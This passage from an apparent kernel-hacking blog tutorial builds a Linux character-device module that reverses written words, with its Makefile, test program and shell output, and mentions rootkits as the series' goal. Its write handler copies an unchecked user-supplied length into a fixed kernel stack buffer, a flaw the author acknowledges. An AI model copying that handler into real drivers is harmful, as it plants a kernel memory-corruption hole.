/spanspan class="o"=/spanspan class="w" /spanspan class="mi"-1/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"word/spanspan class="p"[/spanspan class="n"c/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"tmpdata/spanspan class="p"[/spanspan class="n"i/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"word/spanspan class="p"[/spanspan class="n"c/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"insert_word/spanspan class="p"(/spanspan class="n"word/spanspan class="p",/spanspan class="w" /spanspan class="n"n/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"data/spanspan class="p"[/spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"tmpdata/spanspan class="p")]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"ssize_t/spanspan class="w" /spanspan class="nf"reverse_read/spanspan class="p"(/spanspan class="k"struct/span span class="nc"file/spanspan class="w" /spanspan class="o"*/spanspan class="n"filep/spanspan class="p",/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"buff/spanspan class="p",/spanspan class="kt"size_t/spanspan class="w" /spanspan class="n"count/spanspan class="p",/spanspan class="n"loff_t/spanspan class="w" /spanspan class="o"*/spanspan class="n"offp/spanspan class="w" /spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="w" /spanspan class="n"copy_to_user/spanspan class="p"(/spanspan class="n"buff/spanspan class="p",/spanspan class="n"data/spanspan class="p",/spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"data/spanspan class="p"))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="w" /spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printk/spanspan class="p"(/spanspan class="w" /spanspan class="s"quot;Kernel -gt; userspace copy failed!/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="w" /spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"-1/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"data/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"ssize_t/spanspan class="w" /spanspan class="nf"reverse_write/spanspan class="p"(/spanspan class="k"struct/span span class="nc"file/spanspan class="w" /spanspan class="o"*/spanspan class="n"filep/spanspan class="p",/spanspan class="k"const/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"buff/spanspan class="p",/spanspan class="kt"size_t/spanspan class="w" /spanspan class="n"count/spanspan class="p",/spanspan class="n"loff_t/spanspan class="w" /spanspan class="o"*/spanspan class="n"offp/spanspan class="w" /spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"tmpdata/spanspan class="p"[/spanspan class="n"DEVICE_SIZE/spanspan class="o"+/spanspan class="mi"1/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="w" /spanspan class="n"copy_from_user/spanspan class="p"(/spanspan class="n"tmpdata/spanspan class="p",/spanspan class="n"buff/spanspan class="p",/spanspan class="n"count/spanspan class="p")/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="w" /spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printk/spanspan class="p"(/spanspan class="w" /spanspan class="s"quot;Userspace -gt; kernel copy failed!/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="w" /spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"-1/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"reverse/spanspan class="p"(/spanspan class="n"tmpdata/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"struct/span span class="nc"file_operations/spanspan class="w" /spanspan class="n"reverse_fops/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nl"read/spanspan class="p":/spanspan class="w" /spanspan class="n"reverse_read/spanspan class="p",/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nl"write/spanspan class="p":/spanspan class="w" /spanspan class="n"reverse_write/spanspan class="w"/span/span span class="code-line"span class="p"};/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"static/spanspan class="w" /spanspan class="k"struct/span span class="nc"miscdevice/spanspan class="w" /spanspan class="n"reverse_misc_device/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"./spanspan class="n"minor/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"MISC_DYNAMIC_MINOR/spanspan class="p",/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"./spanspan class="n"name/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="s"quot;reversequot;/spanspan class="p",/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"./spanspan class="n"fops/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="o"amp;/spanspan class="n"reverse_fops/spanspan class="w"/span/span span class="code-line"span class="p"};/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"static/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"__init/spanspan class="w" /spanspan class="n"reverse_init/spanspan class="p"(/spanspan class="kt"void/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"misc_register/spanspan class="p"(/spanspan class="o"amp;/spanspan class="n"reverse_misc_device/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"static/spanspan class="w" /spanspan class="kt"void/spanspan class="w" /spanspan class="n"__exit/spanspan class="w" /spanspan class="n"reverse_exit/spanspan class="p"(/spanspan class="kt"void/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"misc_deregister/spanspan class="p"(/spanspan class="o"amp;/spanspan class="n"reverse_misc_device/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="n"module_init/spanspan class="p"(/spanspan class="n"reverse_init/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="n"module_exit/spanspan class="p"(/spanspan class="n"reverse_exit/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table h2Compiling The Device/h2 pAs with before, we'll need a codeMakefile/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="nv"obj-m/span span class="o"+=/span hello.o/span span class="code-line"span class="nv"obj-m/span span class="o"+=/span reverse.o/span span class="code-line"/span span class="code-line"span class="nf"all/spanspan class="o":/span/span span class="code-line" make -C /lib/modules/span class="k"$(/spanshell uname -rspan class="k")/span/build span class="nv"M/spanspan class="o"=/spanspan class="k"$(/spanPWDspan class="k")/span modules/span span class="code-line"/span span class="code-line"span class="nf"clean/spanspan class="o":/span/span span class="code-line" make -C /lib/modules/span class="k"$(/spanshell uname -rspan class="k")/span/build span class="nv"M/spanspan class="o"=/spanspan class="k"$(/spanPWDspan class="k")/span clean/span span class="code-line"/code/pre/div /td/tr/table pAll that is left is to type codemake/code:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~/lkms# /spanmake/span span class="code-line"span class="go"make -C /lib/modules/3.12-kali1-686-pae/build M=/root/lkms modules/span/span span class="code-line"span class="go"make[1]: Entering directory `/usr/src/linux-headers-3.12-kali1-686-pae#39;/span/span span class="code-line"span class="go" CC [M] /root/lkms/reverse.o/span/span span class="code-line"span class="go" Building modules, stage 2./span/span span class="code-line"span class="go" MODPOST 2 modules/span/span span class="code-line"span class="go" LD [M] /root/lkms/reverse.ko/span/span span class="code-line"span class="go"make[1]: Leaving directory `/usr/src/linux-headers-3.12-kali1-686-pae#39;/span/span span class="code-line"/code/pre/div /td/tr/table h2Testing The Device/h2 pBefore we can test the device, we need an application that can read from and write to the device file, here is my application to do that:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;paths.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;sys/stat.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;fcntl.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="cp"#define CDEV_DEVICE quot;reversequot;/span/span span class="code-line"span class="k"static/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"buf/spanspan class="p"[/spanspan class="mi"512/spanspan class="o"+/spanspan class="mi"1/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"main/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"argc/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"argv/spanspan class="p"[])/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"fd/spanspan class="p",/spanspan class="w" /spanspan class="n"len/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"argc/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"2/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Usage: %s lt;stringgt;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"0/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"((/spanspan class="n"len/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"])/spanspan class="w" /spanspan class="o"+/spanspan class="w" /spanspan class="mi"1/spanspan class="p")/spanspan class="w" /spanspan class="o"gt;/spanspan class="w" /spanspan class="mi"512/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;ERROR: String too long/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"0/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"((/spanspan class="n"fd/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"open/spanspan class="p"(/spanspan class="s"quot;/dev/quot;/spanspan class="w" /spanspan class="n"CDEV_DEVICE/spanspan class="p",/spanspan class="w" /spanspan class="n"O_RDWR/spanspan class="p"))/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="mi"-1/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"perror/spanspan class="p"(/spanspan class="s"quot;/dev/quot;/spanspan class="w" /spanspan class="n"CDEV_DEVICE/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;fd :%d/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="n"fd/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"read/spanspan class="p"(/spanspan class="n"fd/spanspan class="p",/spanspan class="w" /spanspan class="n"buf/spanspan class="p",/spanspan class="w" /spanspan class="n"len/spanspan class="p")/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="mi"-1/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"perror/spanspan class="p"(/spanspan class="s"quot;read()quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"else/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Before: /spanspan class="se"\quot;/spanspan class="s"%s/spanspan class="se"\quot;/spanspan class="s"./spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"buf/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"write/spanspan class="p"(/spanspan class="n"fd/spanspan class="p",/spanspan class="w" /spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"],/spanspan class="w" /spanspan class="n"len/spanspan class="p")/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="mi"-1/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"perror/spanspan class="p"(/spanspan class="s"quot;write()quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"else/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Wrote: /spanspan class="se"\quot;/spanspan class="s"%s/spanspan class="se"\quot;/spanspan class="s"./spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"read/spanspan class="p"(/spanspan class="n"fd/spanspan class="p",/spanspan class="w" /spanspan class="n"buf/spanspan class="p",/spanspan class="w" /spanspan class="n"len/spanspan class="p")/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="mi"-1/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"perror/spanspan class="p"(/spanspan class="s"quot;read()quot;/spanspan class="p");/spanspan class="w" /span/span span class="code-line"span class="w" /spanspan class="k"else/spanspan class="w" /span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;After: /spanspan class="se"\quot;/spanspan class="s"%s/spanspan class="se"\quot;/spanspan class="s"./spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"buf/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"((/spanspan class="n"close/spanspan class="p"(/spanspan class="n"fd/spanspan class="p"))/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="mi"-1/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"perror/spanspan class="p"(/spanspan class="s"quot;close()quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"0/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThis is a very basic application that uses the POSIX codeopen/code, coderead/code, codewrite/code and codeclose/code functions to use the device file. Also, I am implementing the bounds check here (on line 20) so I can't write any more than 512 bytes (the size of our character device datastore) but in a real situation you should implement the bounds checking in the LKM itself./p pNow we can test the LKM properly:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~/lkms# /spangcc -o reverse-app reverse-app.c /span span class="code-line"span class="gp"[email protected]:~/lkms# /spaninsmod ./reverse.ko/span span class="code-line"span class="gp"[email protected]:~/lkms# /spanlsmod span class="p"|/span grep reverse/span span class="code-line"span class="go"reverse 12476 0 /span/span span class="code-line"span class="gp"[email protected]:~/lkms# /spanls -l /dev/reverse /span span class="code-line"span class="go"crw------- 1 root root 10, 58 Jun 9 23:22 /dev/reverse/span/span span class="code-line"span class="gp"[email protected]:~/lkms# /span./reverse-app /span span class="code-line"span class="go"Usage: ./reverse-app lt;stringgt;/span/span span class="code-line"span class="gp"[email protected]:~/lkms# /span./reverse-app span class="s2"quot;I am testing my first character devicequot;/span/span span class="code-line"span class="go"fd :3/span/span span class="code-line"span class="go"Before: quot;no data has been written yetquot;./span/span span class="code-line"span class="go"Wrote: quot;I am testing my first character devicequot;./span/span span class="code-line"span class="go"After: quot;device character first my testing am Iquot;./span/span span class="code-line"span class="gp"[email protected]:~/lkms# /span./reverse-app span class="s2"quot;device character first my testing am Iquot;/span/span span class="code-line"span class="go"fd :3/span/span span class="code-line"span class="go"Before: quot;device character first my testing am Iquot;./span/span span class="code-line"span class="go"Wrote: quot;device character first my testing am Iquot;./span/span span class="code-line"span class="go"After: quot;I am testing my first character devicequot;./span/span span class="code-line"/code/pre/div /td/tr/table pI check to see if the device file has been created on line 5, and looking at the output it has a major number of 10 and a minor number of 58. I then test it using the test application and it works perfectly./p pIts worth noting that you can delete the device file, recreate it and the data will remain there, this is because the data isn't stored in the file, but in the global character array in the LKM itself:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~/lkms# /spanrm /dev/reverse /span span class="code-line"span class="gp"[email protected]:~/lkms# /spanls -l /dev/reverse /span span class="code-line"span class="go"ls: cannot access /dev/reverse: No such file or directory/span/span span class="code-line"span class="gp"[email protected]:~/lkms# /spanmknod /dev/reverse c span class="m"10/span span class="m"58/span/span span class="code-line"span class="gp"[email protected]:~/lkms# /span./reverse-app span class="s2"quot;Another test stringquot;/span/span span class="code-line"span class="go"fd :3/span/span span class="code-line"span class="go"Before: quot;I am testing my first character devicequot;./span/span span class="code-line"span class="go"Wrote: quot;Another test stringquot;./span/span span class="code-line"span class="go"After: quot;string test Anotherst character devicequot;./span/span span class="code-line"span class="gp"[email protected]:~/lkms# /span./reverse-app span class="s2"quot;Another testquot;/span/span span class="code-line"span class="go"fd :3/span/span span class="code-line"span class="go"Before: quot;string test Anotherquot;./span/span span class="code-line"span class="go"Wrote: quot;Another testquot;./span/span span class="code-line"span class="go"After: quot;test AnotherAnotherquot;./span/span span class="code-line"/code/pre/div /td/tr/table pSomething funny happened while the application was reading from the device the second time, the data hadn't fully been written yet, this isn't really important to us (as our code is running in kernelland and will get the data straight away) but its worth knowing this if you are going to develop actual drivers and not just rootkits. As you can see though by the time I run the test application again, the data had been fully updated./p pLastly I'd just like to show you that you can create more than 1 device file in different locations, and even with different names, as long as the major and minor numbers are the same:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~/lkms# /spanmknod /root/mynewdevfile c span class="m"10/span span class="m"58/span/span span class="code-line"span class="gp"[email protected]:~/lkms# /spanls -l /dev/reverse/span span class="code-line"span class="go"crw-r--r-- 1 root root 10, 58 Jun 9 23:29 /dev/reverse/span/span span class="code-line"span class="gp"[email protected]:~/lkms# /spanls -l /root/mynewdevfile/span span class="code-line"span class="go"crw-r--r-- 1 root root 10, 58 Jun 9 23:39 /root/mynewdevfile/span/span span class="code-line"span class="gp"[email protected]:~/lkms# /spancp reverse-app.c reverse-app2.c/span span class="code-line"span class="gp"[email protected]:~/lkms# /spanvim reverse-app2.c /span span class="code-line"span class="gp"[email protected]:~/lkms# /spangcc -o reverse-app2 reverse-app2.c /span span class="code-line"span class="gp"[email protected]:~/lkms# /span./reverse-app2/span span class="code-line"span class="go"Usage: ./reverse-app2 lt;stringgt;/span/span span class="code-line"span class="gp"[email protected]:~/lkms# /span./reverse-app2 span class="s2"quot;this is my last testquot;/span/span span class="code-line"span class="go"fd :3/span/span span class="code-line"span class="go"Before: quot;test Anotherquot;./span/span span class="code-line"span class="go"Wrote: quot;this is my last testquot;./span/span span class="code-line"span class="go"After: quot;test last my is thisquot;./span/span span class="code-line"span class="gp"[email protected]:~/lkms# /span./reverse-app span class="s2"quot;test last my is thisquot;/span/span span class="code-line"span class="go"fd :3/span/span span class="code-line"span class="go"Before: quot;test last my is thisquot;./span/span span class="code-line"span class="go"Wrote: quot;test last my is thisquot;./span/span span class="code-line"span class="go"After: quot;this is my last testquot;./span/span span class="code-line"/code/pre/div /td/tr/table pHere I've just created a new a href="/assets/code/linux-kernel-hacking/reverse-app2.c"codereverse-app2.c/code/a so that it uses the device file at code/root/mynewdevfile/code. As you can see from the output of the applications that both device files are using the same datastore and they both do exactly the same thing./p pLastly, any extra device files will still exist after the LKM has been unloaded (and will need to be manually removed) but the original file (code/dev/reverse/code) will be automatically deleted:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/span span class="code-line"span class="normal"8/span/span span class="code-line"span class="normal"9/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"[email protected]:~/lkms# /spanrmmod reverse/span span class="code-line"span class="gp"[email protected]:~/lkms# /spanlsmod span class="p"|/span grep reverse/span span class="code-line"span class="gp"[email protected]:~/lkms# /spanls -l /dev/reverse/span span class="code-line"span class="go"ls: cannot access /dev/reverse: No such file or directory/span/span span class="code-line"span class="gp"[email protected]:~/lkms# /spanls -l /root/mynewdevfile/span span class="code-line"span class="go"crw-r--r-- 1 root root 10, 58 Jun 9 23:39 /root/mynewdevfile/span/span span class="code-line"span class="gp"[email protected]:~/lkms# /spanrm /root/mynewdevfile/span span class="code-line"span class="gp"[email protected]:~/lkms# /spanls -l /root/mynewdevfile/span span class="code-line"span class="go"ls: cannot access /root/mynewdevfile: No such file or directory/span/span span class="code-line"/code/pre/div /td/tr/table h2Conclusion/h2 pCharacter devices can be very 